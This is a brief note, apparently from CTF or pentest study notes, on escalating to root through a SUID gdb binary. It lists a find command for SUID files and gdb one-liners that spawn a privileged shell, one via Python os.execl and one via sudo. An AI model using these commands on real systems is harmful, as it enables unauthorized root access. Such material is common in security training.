/usr/bin/gdb

GNU Debugger(GDB) has the suid bit and I can get the root shell with it.

find / -perm /4000 2>/dev/null

#find this

/usr/bin/gbd

#shell escape
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

#root
sudo gdb -nx -ex '!sh' -ex quit

Last updated 2 years ago